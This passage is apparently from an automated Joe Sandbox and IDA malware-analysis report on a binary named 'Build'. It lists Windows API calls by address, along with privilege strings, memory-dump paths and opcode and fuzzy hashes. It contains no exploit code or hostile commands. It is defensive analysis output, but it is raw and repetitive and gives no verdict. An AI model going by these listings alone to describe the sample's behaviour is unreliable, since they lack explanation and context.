                                                                                                    • _wcslen.LIBCMT ref: 0092807F
                                                                                                    • _wcslen.LIBCMT ref: 00928112
                                                                                                      • Part of subcall function 00928C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00928CB2
                                                                                                      • Part of subcall function 00928C95: GetLastError.KERNEL32 ref: 00928CF6
                                                                                                      • Part of subcall function 00928C95: CloseHandle.KERNEL32(?), ref: 00928D05
                                                                                                      • Part of subcall function 0092BC65: DeleteFileW.KERNELBASE(?,?,?,?,0092B14B,?,00000000,0092AF6E,1C667296,00000000,0095517A,000000FF,?,00928882,?,?), ref: 0092BC82
                                                                                                      • Part of subcall function 0092BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,0092B14B,?,00000000,0092AF6E,1C667296,00000000,0095517A,000000FF,?,00928882,?), ref: 0092BCAE
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 009281C1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009281DD
                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,1C667296,00000000), ref: 00928329
                                                                                                      • Part of subcall function 0092B7E2: FlushFileBuffers.KERNEL32(?), ref: 0092B7FC
                                                                                                      • Part of subcall function 0092B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 0092B8B0
                                                                                                      • Part of subcall function 0092AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,0092AF75,1C667296,00000000,0095517A,000000FF,?,00928882,?,?), ref: 0092AFEB
                                                                                                      • Part of subcall function 0092C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0092BF5E,?,?), ref: 0092C305
                                                                                                      • Part of subcall function 0092C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0092BF5E,?,?), ref: 0092C334
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationProcessTime
                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                    • API String ID: 243576179-3508440684
                                                                                                    • Opcode ID: 0b9bf7dfbd46e3ff0190c803e5d03327ce4c3767b7688b58997058d3cc6ddddc
                                                                                                    • Instruction ID: 831e19109e3ecd3cd94680b73b8cce0a1e21ed07eca63f6b2de3949f57c1939f
                                                                                                    • Opcode Fuzzy Hash: 0b9bf7dfbd46e3ff0190c803e5d03327ce4c3767b7688b58997058d3cc6ddddc
                                                                                                    • Instruction Fuzzy Hash: F2D192B1901259ABDB21EFA0DC41BEFB7ACBF44700F00451AFA55E7285DB74AA44CBA1
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00941FD6
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 009420A2
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009420C2
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 009420CC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 254469556-0
                                                                                                    • Opcode ID: e5a80e674ff84c7a57f3c930c3ae8e4b452287d00934d5f1e999c5e90956869f
                                                                                                    • Instruction ID: 7ff2c460f341dd24751ae8fbc7bd018806c20af0f0f18456bdee3716d9665db0
                                                                                                    • Opcode Fuzzy Hash: e5a80e674ff84c7a57f3c930c3ae8e4b452287d00934d5f1e999c5e90956869f
                                                                                                    • Instruction Fuzzy Hash: 90312975D053189BDB20DFA5D989BCCBBB8BF08300F5041EAE40DAB251EB715A84CF04
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(80000000,00940AC5,0000001C,00940CBA,00000000,?,?,?,?,?,?,?,00940AC5,00000004,00985D24,00940D4A), ref: 00940B91
                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00940AC5,00000004,00985D24,00940D4A), ref: 00940BAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                    • String ID: D
                                                                                                    • API String ID: 401686933-2746444292
                                                                                                    • Opcode ID: e2645b1cab8f5cb1beacf155d0ff366315bb1930c475af57448724606fa79467
                                                                                                    • Instruction ID: 02d4e9f781228f77eeda0fc70c03cb8b58ba6a607253dc198803ad9e3ccb25a2
                                                                                                    • Opcode Fuzzy Hash: e2645b1cab8f5cb1beacf155d0ff366315bb1930c475af57448724606fa79467
                                                                                                    • Instruction Fuzzy Hash: 5E01D4326145096BDF14DF29DC05FEE7BA9EFC4328F08C224AE59D7254D634E8018680
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0093D0E1
                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0096272C,?,?), ref: 0093D12A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                    • String ID:
                                                                                                    • API String ID: 2169056816-0
                                                                                                    • Opcode ID: 4fbefaf70080c1245ad677cfcce4208332060b0bf6ac9ee0388b092524bfc497
                                                                                                    • Instruction ID: 31110f65ddd2279035b8b8c8ba7bd55376cb8e49c0b03de890e6cc19ef24aa19
                                                                                                    • Opcode Fuzzy Hash: 4fbefaf70080c1245ad677cfcce4208332060b0bf6ac9ee0388b092524bfc497
                                                                                                    • Instruction Fuzzy Hash: 72115B35224308ABD711DF65DC41FAA77BCEF48701F50842AF901E7291D670AA45DB65
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0092D0A7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: 682b5751e5043f0fbe89cb48148a37c6ed4c7f461a0074c8beda15d7ecb6ece6
                                                                                                    • Instruction ID: d2454694d85b37132e40b62a0360aaf8f8181a4cdc7b8dbbda447e82ee353211
                                                                                                    • Opcode Fuzzy Hash: 682b5751e5043f0fbe89cb48148a37c6ed4c7f461a0074c8beda15d7ecb6ece6
                                                                                                    • Instruction Fuzzy Hash: 26014B70918608CBDB24CF24EC81A9D77B1BB58304F20461DD91A973A1DBB4A949EB40
                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 00930284
                                                                                                      • Part of subcall function 00924C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00924C13
                                                                                                      • Part of subcall function 00933F47: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0092F801,00000000,00000000,?,00965070,?,0092F801,?,?,00000050,?), ref: 00933F64
                                                                                                    • _strlen.LIBCMT ref: 009302A5
                                                                                                    • SetDlgItemTextW.USER32(?,00962274,?), ref: 009302FE
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00930334
                                                                                                    • GetClientRect.USER32(?,?), ref: 00930340
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 009303EB
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0093041B
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0093044A
                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00930452
                                                                                                    • GetWindow.USER32(?,00000005), ref: 0093045D
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0093048D
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 009304FF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                    • String ID: $%s:$CAPTION$d
                                                                                                    • API String ID: 2407758923-2512411981
                                                                                                    • Opcode ID: 0dd56d10011e1fcadcdd4782b28e630d674bc825b28a6d0508493967e4182fb6
                                                                                                    • Instruction ID: 83091344d1848fc93dfaf977b4674364393c9d5c31acffdfdb19d88f7c07d3db
                                                                                                    • Opcode Fuzzy Hash: 0dd56d10011e1fcadcdd4782b28e630d674bc825b28a6d0508493967e4182fb6
                                                                                                    • Instruction Fuzzy Hash: CA815B72509301AFD714DFA8CD89B6FBBE9EBC8714F00092DFA8593290D774E9098B52
                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0094F1B6
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094ED6E
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094ED80
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094ED92
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDA4
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDB6
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDC8
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDDA
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDEC
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EDFE
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EE10
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EE22
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EE34
                                                                                                      • Part of subcall function 0094ED51: _free.LIBCMT ref: 0094EE46
                                                                                                    • _free.LIBCMT ref: 0094F1AB
                                                                                                      • Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
                                                                                                      • Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22
                                                                                                    • _free.LIBCMT ref: 0094F1CD
                                                                                                    • _free.LIBCMT ref: 0094F1E2
                                                                                                    • _free.LIBCMT ref: 0094F1ED
                                                                                                    • _free.LIBCMT ref: 0094F20F
                                                                                                    • _free.LIBCMT ref: 0094F222
                                                                                                    • _free.LIBCMT ref: 0094F230
                                                                                                    • _free.LIBCMT ref: 0094F23B
                                                                                                    • _free.LIBCMT ref: 0094F273
                                                                                                    • _free.LIBCMT ref: 0094F27A
                                                                                                    • _free.LIBCMT ref: 0094F297
                                                                                                    • _free.LIBCMT ref: 0094F2AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: 09e8831127c0369eda80e6713ab842711008dfa13e244951a451c67917cd31af
                                                                                                    • Instruction ID: 3971094a0702ccd1da2ec15b23816116861914608bbacda6346784712958fa5a
                                                                                                    • Opcode Fuzzy Hash: 09e8831127c0369eda80e6713ab842711008dfa13e244951a451c67917cd31af
                                                                                                    • Instruction Fuzzy Hash: C2316832A04602DFEB20EA79D845F9AB3E9FF84310F204529E55AD7591DFB1EC81CB20
                                                                                                    APIs
                                                                                                    • GetWindow.USER32(?,00000005), ref: 0093FA20
                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0093FA4C
                                                                                                      • Part of subcall function 00934168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0092E084,00000000,.exe,?,?,00000800,?,?,?,0093AD5D), ref: 0093417E
                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0093FA68
                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0093FA7F
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0093FA93
                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0093FABC
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0093FAC3
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0093FACC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                    • String ID: STATIC
                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                    • Opcode ID: 549004e27e7e97944797e2331e6a7c5064d97f7151675f07c1b796c72e02f3d4
                                                                                                    • Instruction ID: 4d9c40d853c059313880fd37a35a48b32fe71649fe2a47b528343714d5c7ff05
                                                                                                    • Opcode Fuzzy Hash: 549004e27e7e97944797e2331e6a7c5064d97f7151675f07c1b796c72e02f3d4
                                                                                                    • Instruction Fuzzy Hash: E221467294C7107BE320ABB0CC4AFAFB79CAF98700F000425F955E6291EB74DD419BA1
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0094B8C5
                                                                                                      • Part of subcall function 0094BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?), ref: 0094BB10
                                                                                                      • Part of subcall function 0094BAFA: GetLastError.KERNEL32(?,?,0094EEE6,?,00000000,?,00000000,?,0094EF0D,?,00000007,?,?,0094F30A,?,?), ref: 0094BB22
                                                                                                    • _free.LIBCMT ref: 0094B8D1
                                                                                                    • _free.LIBCMT ref: 0094B8DC
                                                                                                    • _free.LIBCMT ref: 0094B8E7
                                                                                                    • _free.LIBCMT ref: 0094B8F2
                                                                                                    • _free.LIBCMT ref: 0094B8FD
                                                                                                    • _free.LIBCMT ref: 0094B908
                                                                                                    • _free.LIBCMT ref: 0094B913
                                                                                                    • _free.LIBCMT ref: 0094B91E
                                                                                                    • _free.LIBCMT ref: 0094B92C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: a0147f901a7287f8a9404cd3469da7c83f06eeda5bf2bd876fb49e93a5b121ee
                                                                                                    • Instruction ID: d86e3c3fdc2a5f972697b5b596ed24405fd96cfcac7a5dc0643d53cdea94fdf6
                                                                                                    • Opcode Fuzzy Hash: a0147f901a7287f8a9404cd3469da7c83f06eeda5bf2bd876fb49e93a5b121ee
                                                                                                    • Instruction Fuzzy Hash: 4311B97A100148BFCB01EF59C992DD93BB9EF44350B0180A5FA094F622DB71EE52DB80
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 322700389-393685449
                                                                                                    • Opcode ID: 63cc3c25c8d7536145c8135cc91f31a84666e700f21e2bff91164ea1458adacd
                                                                                                    • Instruction ID: 0cd616fd5335dc8793822204823a115302a0fe351fcd1af05532c0d7d027bb27
                                                                                                    • Opcode Fuzzy Hash: 63cc3c25c8d7536145c8135cc91f31a84666e700f21e2bff91164ea1458adacd
                                                                                                    • Instruction Fuzzy Hash: E0B14571800A09EFCF29DFE4C881EAEB7B9BF48314B164569E8056B213D735EA51CF91
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0093B656
                                                                                                    • _wcslen.LIBCMT ref: 0093B6F6
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 0093B705
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0093B726
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000986000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726824155.0000000000987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_920000_Build.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                    • API String ID: 1116704506-4209811716
                                                                                                    • Opcode ID: 997242688ce06a66d79ca5da20303b2fa01cde3505f7612f90cbea7fdcaa85be
                                                                                                    • Instruction ID: 910e039bf19c617caf731de07468c69f8d3270decf012e73f323f8954044daf6
                                                                                                    • Opcode Fuzzy Hash: 997242688ce06a66d79ca5da20303b2fa01cde3505f7612f90cbea7fdcaa85be
                                                                                                    • Instruction Fuzzy Hash: DF3126722183017BE725AB71AC47F6FB79CDFD1325F10011EFA01961D2FB6499488BA6
                                                                                                    APIs
                                                                                                      • Part of subcall function 00921366: GetDlgItem.USER32(00000000,00003021), ref: 009213AA
                                                                                                      • Part of subcall function 00921366: SetWindowTextW.USER32(00000000,009565F4), ref: 009213C0
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0093D910
                                                                                                    • SendMessageW.USER32(?,00000080,00000001,0004045F), ref: 0093D937
                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0093D950
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0093D961
                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0093D96A
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0093D97E
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0093D994
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1726555426.0000000000921000.00000020.00000001.01000000.00000006.sdmp, Offset: 00920000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1726513644.0000000000920000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726607480.0000000000956000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000962000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000969000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1726630890.0000000000982000.00000004.00000001.01000000.00000006.sdmpDownload File
